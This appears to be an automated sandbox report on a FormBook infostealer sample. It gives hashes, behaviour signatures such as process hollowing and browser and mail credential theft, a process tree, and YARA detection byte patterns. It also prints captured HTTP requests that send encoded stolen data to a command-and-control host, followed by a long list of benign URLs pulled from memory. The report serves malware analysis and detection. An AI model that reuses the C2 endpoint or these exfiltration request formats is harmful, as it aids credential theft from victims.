Analysis Report Dgslimt_Signed_.exe

Overview

General Information

Sample Name: Dgslimt_Signed_.exe
Analysis ID: 254519
MD5: 738cd543912792b376d1a444c01f2a13
SHA1: 9de5396ba7bbb9b413df229948c63dad75cbebf0
SHA256: a678db2b0d3f84a7edaa2c100192a43397a7be3d2c482b34d7bdaf1572f00720

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains strange resources
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Dgslimt_Signed_.exe (PID: 6600 cmdline: 'C:\Users\user\Desktop\Dgslimt_Signed_.exe' MD5: 738CD543912792B376D1A444C01F2A13)
    • ieinstal.exe (PID: 7036 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 5568 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
        • ieinstal.exe (PID: 4960 cmdline: 'C:\Program Files (x86)\internet explorer\ieinstal.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • ieinstal.exe (PID: 6672 cmdline: 'C:\Program Files (x86)\internet explorer\ieinstal.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Dgsllll[1]
Rule: SUSP_Reversed_Base64_Encoded_EXE
Description: Detects an base64 encoded executable with reversed characters
Author: Florian Roth
Strings:
  • 0x5d56f:$s4: AEAAAAIAAQpVT
  • 0x7ca9f:$s4: AEAAAAIAAQpVT

Memory Dumps

Source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x18449:$sqlite3step: 68 34 1C 7B E1
  • 0x1855c:$sqlite3step: 68 34 1C 7B E1
  • 0x18478:$sqlite3text: 68 38 2A 90 C5
  • 0x1859d:$sqlite3text: 68 38 2A 90 C5
  • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C

Source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

21 further entries not shown.

Unpacked PEs

Source: 4.2.ieinstal.exe.10410000.3.raw.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 4.2.ieinstal.exe.10410000.3.raw.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 4.2.ieinstal.exe.10410000.3.raw.unpack
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x18449:$sqlite3step: 68 34 1C 7B E1
  • 0x1855c:$sqlite3step: 68 34 1C 7B E1
  • 0x18478:$sqlite3text: 68 38 2A 90 C5
  • 0x1859d:$sqlite3text: 68 38 2A 90 C5
  • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C

Source: 4.2.ieinstal.exe.10410000.3.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 4.2.ieinstal.exe.10410000.3.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

1 further entry not shown.

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Yara detected FormBook
Source: Yara match, File source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE

Machine Learning detection for sample
Source: Dgslimt_Signed_.exe, Joe Sandbox ML: detected

Networking:

Uses netstat to query active network connections and open ports
Source: unknown, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic, HTTP traffic detected:
  GET /m3px/?RL=4MyE+CpeL4Pkxg37nk0WDQpTsr14l9AWoSemyB7rAQ1tkLL6mKl4JYswWkNQaMP7Hy1d&Rf=hd8d5zxpJVY HTTP/1.1
  Host: www.thedraftmedic.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  POST /m3px/ HTTP/1.1
  Host: www.thedraftmedic.com
  Connection: close
  Content-Length: 408
  Cache-Control: no-cache
  Origin: http://www.thedraftmedic.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.thedraftmedic.com/m3px/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: RL=wu~-gmEpW4DUx3Cm40FwDAl9tZAuy8sw0VPHrSW8OydhrYr_36Q6aItHUmRSadLVYw4NedG0FzMP4GzIW5T6(Q5Yq8Ivhx5QZlG1ogmh9R(rXl8r970DUnu7(VufUmRtyDJjt2WEO3ohdF05mvaMd4UGrufaApeAJ3yM0Dq3mP~INnhURagcmGGxom2um46hGdcEYpKQrk8f6NfXVh541Ekepy9a5ErLFtk784Vsr0P1Ztj4JrwcS1GP26Tn0WLSG1vFTGfGuRWm2SNY1xu6ipXAEibNw2oMypazfixPPtqffO0zQqHeDbcem4MGItqkweqXmxsU7B0_G3KCGqLTHLa0EzGntHbhYFv673JJ~pBQZ3IpWIpJ1dpLalZ0Nn9DCwuDmb7D6UaTja7S(w).
Source: global traffic, HTTP traffic detected:
  POST /m3px/ HTTP/1.1
  Host: www.thedraftmedic.com
  Connection: close
  Content-Length: 167132
  Cache-Control: no-cache
  Origin: http://www.thedraftmedic.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.thedraftmedic.com/m3px/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: (167132-byte form-encoded body, hex dump omitted)
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown, DNS traffic detected: queries for: cdn.discordapp.com
Source: unknown, HTTP traffic detected:
  POST /m3px/ HTTP/1.1
  Host: www.thedraftmedic.com
  Connection: close
  Content-Length: 408
  Cache-Control: no-cache
  Origin: http://www.thedraftmedic.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.thedraftmedic.com/m3px/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: RL=wu~-gmEpW4DUx3Cm40FwDAl9tZAuy8sw0VPHrSW8OydhrYr_36Q6aItHUmRSadLVYw4NedG0FzMP4GzIW5T6(Q5Yq8Ivhx5QZlG1ogmh9R(rXl8r970DUnu7(VufUmRtyDJjt2WEO3ohdF05mvaMd4UGrufaApeAJ3yM0Dq3mP~INnhURagcmGGxom2um46hGdcEYpKQrk8f6NfXVh541Ekepy9a5ErLFtk784Vsr0P1Ztj4JrwcS1GP26Tn0WLSG1vFTGfGuRWm2SNY1xu6ipXAEibNw2oMypazfixPPtqffO0zQqHeDbcem4MGItqkweqXmxsU7B0_G3KCGqLTHLa0EzGntHbhYFv673JJ~pBQZ3IpWIpJ1dpLalZ0Nn9DCwuDmb7D6UaTja7S(w).
Source: explorer.exe, 00000009.00000000.313630372.000000000A9D0000.00000002.00000001.sdmp, String found in binary or memory: http://%s.com
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000009.00000000.313630372.000000000A9D0000.00000002.00000001.sdmp, String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000009.00000000.320196812.000000000E929000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmp, String found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
